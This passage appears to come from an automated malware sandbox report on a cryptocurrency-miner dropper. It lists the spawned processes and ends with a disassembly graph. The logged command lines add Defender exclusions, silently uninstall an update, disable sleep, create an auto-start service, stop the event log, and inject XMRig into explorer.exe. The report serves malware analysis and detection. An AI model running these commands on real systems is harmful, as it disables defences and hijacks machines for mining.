                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\aA45th2ixY.exe"
                                                                Imagebase:0x7ff6e17d0000
                                                                File size:2'684'712 bytes
                                                                MD5 hash:6694E88CD0B76E774385E450B3027F35
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:19:38:07
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:19:38:07
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff607da0000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe delete "OAQXWXCL"
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff61aa00000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto"
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe start "OAQXWXCL"
                                                                Imagebase:0x7ff73dcf0000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:19:38:11
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:23
                                                                Start time:19:38:12
                                                                Start date:06/10/2024
                                                                Path:C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
                                                                Imagebase:0x7ff7b9e80000
                                                                File size:2'684'712 bytes
                                                                MD5 hash:6694E88CD0B76E774385E450B3027F35
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 58%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:24
                                                                Start time:19:38:12
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:25
                                                                Start time:19:38:12
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:26
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff607da0000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:27
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:28
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:29
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:30
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:31
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:32
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:33
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                Imagebase:0x7ff794000000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:34
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:35
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:36
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:37
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:explorer.exe
                                                                Imagebase:0x7ff72b770000
                                                                File size:5'141'208 bytes
                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                General

                                                                Target ID:38
                                                                Start time:19:38:14
                                                                Start date:06/10/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff61aa00000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:12.3%
                                                                  Total number of Nodes:1512
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 4106 7ff6e17d1ac3 4108 7ff6e17d1a70 4106->4108 4107 7ff6e17d199e 4111 7ff6e17d1a0f 4107->4111 4114 7ff6e17d19e9 VirtualProtect 4107->4114 4108->4107 4109 7ff6e17d1b36 4108->4109 4113 7ff6e17d1b5c 4108->4113 4110 7ff6e17d1ba0 4 API calls 4109->4110 4112 7ff6e17d1b53 4110->4112 4114->4107 4165 7ff6e17d2104 4166 7ff6e17d2111 EnterCriticalSection 4165->4166 4169 7ff6e17d2218 4165->4169 4167 7ff6e17d220b LeaveCriticalSection 4166->4167 4173 7ff6e17d212e 4166->4173 4167->4169 4168 7ff6e17d2272 4169->4168 4171 7ff6e17d2241 DeleteCriticalSection 4169->4171 4172 7ff6e17d2230 free 4169->4172 4170 7ff6e17d214d TlsGetValue GetLastError 4170->4173 4171->4168 4172->4171 4172->4172 4173->4167 4173->4170 4148 7ff6e17d1e65 4149 7ff6e17d1e67 signal 4148->4149 4150 7ff6e17d1e7c 4149->4150 4151 7ff6e17d1e99 4149->4151 4150->4151 4152 7ff6e17d1e82 signal 4150->4152 4152->4151 4194 7ff6e17d219e 4195 7ff6e17d2272 4194->4195 4196 7ff6e17d21ab EnterCriticalSection 4194->4196 4197 7ff6e17d2265 LeaveCriticalSection 4196->4197 4199 7ff6e17d21c8 4196->4199 4197->4195 4198 7ff6e17d21e9 TlsGetValue GetLastError 4198->4199 4199->4197 4199->4198 2638 7ff6e17d1140 2641 7ff6e17d1160 2638->2641 2640 7ff6e17d1156 2642 7ff6e17d118b 2641->2642 2643 7ff6e17d11b9 2641->2643 2642->2643 2644 7ff6e17d1190 2642->2644 2645 7ff6e17d11d3 2643->2645 2646 7ff6e17d11c7 _amsg_exit 2643->2646 2644->2643 2647 7ff6e17d11a0 Sleep 2644->2647 2648 7ff6e17d1201 _initterm 2645->2648 2649 7ff6e17d121a 2645->2649 2646->2645 2647->2643 2647->2644 2648->2649 2666 7ff6e17d1880 2649->2666 2652 7ff6e17d126a 2653 7ff6e17d126f malloc 2652->2653 2654 7ff6e17d128b 2653->2654 2657 7ff6e17d12d2 2653->2657 2655 7ff6e17d12a0 strlen malloc memcpy 2654->2655 2655->2655 2656 7ff6e17d12d0 2655->2656 2656->2657 2679 7ff6e17d3b50 2657->2679 2659 7ff6e17d1315 2660 7ff6e17d1344 2659->2660 2661 7ff6e17d1324 2659->2661 2664 7ff6e17d1160 93 API calls 2660->2664 2662 7ff6e17d132d _cexit 2661->2662 2663 7ff6e17d1338 2661->2663 2662->2663 2663->2640 2665 7ff6e17d1366 2664->2665 2665->2640 2667 7ff6e17d1247 SetUnhandledExceptionFilter 2666->2667 2668 7ff6e17d18a2 2666->2668 2667->2652 2668->2667 2669 7ff6e17d194d 2668->2669 2674 7ff6e17d1a20 2668->2674 2670 7ff6e17d199e 2669->2670 2671 7ff6e17d1956 2669->2671 2670->2667 2673 7ff6e17d19e9 VirtualProtect 2670->2673 2671->2670 2854 7ff6e17d1ba0 2671->2854 2673->2670 2674->2670 2675 7ff6e17d1b5c 2674->2675 2676 7ff6e17d1b36 2674->2676 2677 7ff6e17d1ba0 4 API calls 2676->2677 2678 7ff6e17d1b53 2677->2678 2681 7ff6e17d3b66 2679->2681 2680 7ff6e17d3c60 wcslen 2864 7ff6e17d153f 2680->2864 2681->2680 2686 7ff6e17d3d60 2689 7ff6e17d3d7a memset wcscat memset 2686->2689 2691 7ff6e17d3dd3 2689->2691 2692 7ff6e17d3e23 wcslen 2691->2692 2693 7ff6e17d3e35 2692->2693 2697 7ff6e17d3e7c 2692->2697 2694 7ff6e17d3e50 _wcsnicmp 2693->2694 2695 7ff6e17d3e66 wcslen 2694->2695 2694->2697 2695->2694 2695->2697 2696 7ff6e17d3edd wcscpy wcscat memset 2699 7ff6e17d3f1c 2696->2699 2697->2696 2698 7ff6e17d4024 wcscpy wcscat 2700 7ff6e17d404f memset 2698->2700 2704 7ff6e17d4131 2698->2704 2699->2698 2701 7ff6e17d4070 2700->2701 2702 7ff6e17d40d5 wcslen 2701->2702 2703 7ff6e17d40eb 2702->2703 2709 7ff6e17d412c 2702->2709 2706 7ff6e17d4100 _wcsnicmp 2703->2706 3024 7ff6e17d2df0 2704->3024 2707 7ff6e17d4116 wcslen 2706->2707 2706->2709 2707->2706 2707->2709 2708 7ff6e17d43a3 wcscpy wcscat memset 2710 7ff6e17d43e5 2708->2710 2709->2708 2711 7ff6e17d442a wcscpy wcscat memset 2710->2711 2712 7ff6e17d4470 2711->2712 2713 7ff6e17d44d5 wcscpy wcscat memset 2712->2713 2714 7ff6e17d451b 2713->2714 2715 7ff6e17d454b wcscpy wcscat 2714->2715 2716 7ff6e17d6648 memcpy 2715->2716 2717 7ff6e17d457d 2715->2717 2716->2717 2718 7ff6e17d2df0 11 API calls 2717->2718 2719 7ff6e17d472c 2718->2719 2720 7ff6e17d2df0 11 API calls 2719->2720 2721 7ff6e17d4840 memset 2720->2721 2723 7ff6e17d4861 2721->2723 2722 7ff6e17d48a4 wcscpy wcscat memset 2725 7ff6e17d48ed 2722->2725 2723->2722 2724 7ff6e17d4930 wcscpy wcscat wcslen 3036 7ff6e17d146d 2724->3036 2725->2724 2728 7ff6e17d4a44 2731 7ff6e17d4b3a wcslen 2728->2731 2738 7ff6e17d4d2d 2728->2738 3184 7ff6e17d157b 2731->3184 2732 7ff6e17d145e 2 API calls 2732->2728 2736 7ff6e17d4d0c memset 2736->2738 2737 7ff6e17d4c9f wcslen 3224 7ff6e17d15e4 2737->3224 2739 7ff6e17d4d9d wcscpy wcscat 2738->2739 2743 7ff6e17d4dcf 2739->2743 2741 7ff6e17d4bf9 2741->2736 2741->2737 2745 7ff6e17d2df0 11 API calls 2743->2745 2744 7ff6e17d145e 2 API calls 2744->2736 2747 7ff6e17d4ed7 2745->2747 2746 7ff6e17d2df0 11 API calls 2748 7ff6e17d4fec 2746->2748 2747->2746 2749 7ff6e17d2df0 11 API calls 2748->2749 2750 7ff6e17d50d6 2749->2750 2751 7ff6e17d2df0 11 API calls 2750->2751 2754 7ff6e17d51c0 2751->2754 2752 7ff6e17d5301 wcslen 2753 7ff6e17d157b 2 API calls 2752->2753 2755 7ff6e17d538b 2753->2755 2754->2752 2756 7ff6e17d5393 memset 2755->2756 2759 7ff6e17d54a5 2755->2759 2757 7ff6e17d53b4 2756->2757 2758 7ff6e17d5404 wcslen 2757->2758 3227 7ff6e17d15a8 2758->3227 2761 7ff6e17d2df0 11 API calls 2759->2761 2768 7ff6e17d5642 _wcsicmp 2759->2768 2767 7ff6e17d5550 2761->2767 2763 7ff6e17d5474 _wcsnicmp 2764 7ff6e17d5499 2763->2764 2772 7ff6e17d5c71 2763->2772 2765 7ff6e17d145e 2 API calls 2764->2765 2765->2759 2766 7ff6e17d2df0 11 API calls 2766->2768 2767->2766 2770 7ff6e17d565d memset 2768->2770 2785 7ff6e17d59e0 2768->2785 2769 7ff6e17d5cce wcslen 2771 7ff6e17d15a8 2 API calls 2769->2771 2774 7ff6e17d5681 2770->2774 2773 7ff6e17d5d2a 2771->2773 2772->2769 2776 7ff6e17d145e 2 API calls 2773->2776 2775 7ff6e17d56c6 wcscpy wcscat wcslen 2774->2775 2778 7ff6e17d146d 2 API calls 2775->2778 2776->2759 2777 7ff6e17d5a80 wcslen 2779 7ff6e17d153f 2 API calls 2777->2779 2780 7ff6e17d5793 2778->2780 2781 7ff6e17d5b0b 2779->2781 3242 7ff6e17d1530 2780->3242 2783 7ff6e17d145e 2 API calls 2781->2783 2784 7ff6e17d5b1c 2783->2784 2797 7ff6e17d5bb3 2784->2797 3474 7ff6e17d2f70 2784->3474 2785->2777 2787 7ff6e17d6e1e 2789 7ff6e17d145e 2 API calls 2787->2789 2788 7ff6e17d57d1 3273 7ff6e17d14a9 2788->3273 2794 7ff6e17d6e2a 2789->2794 2793 7ff6e17d5c10 wcslen 2798 7ff6e17d5c26 2793->2798 2799 7ff6e17d5c6c 2793->2799 2794->2659 2795 7ff6e17d586d 2803 7ff6e17d145e 2 API calls 2795->2803 2796 7ff6e17d5b49 3478 7ff6e17d38e0 2796->3478 2797->2793 2800 7ff6e17d5c40 _wcsnicmp 2798->2800 2807 7ff6e17d5dd9 memset wcscpy wcscat 2799->2807 2800->2799 2804 7ff6e17d5c56 wcslen 2800->2804 2815 7ff6e17d5861 2803->2815 2804->2799 2804->2800 2810 7ff6e17d2f70 2 API calls 2807->2810 2808 7ff6e17d5855 2811 7ff6e17d145e 2 API calls 2808->2811 2809 7ff6e17d14c7 2 API calls 2812 7ff6e17d5ba5 2809->2812 2814 7ff6e17d5e30 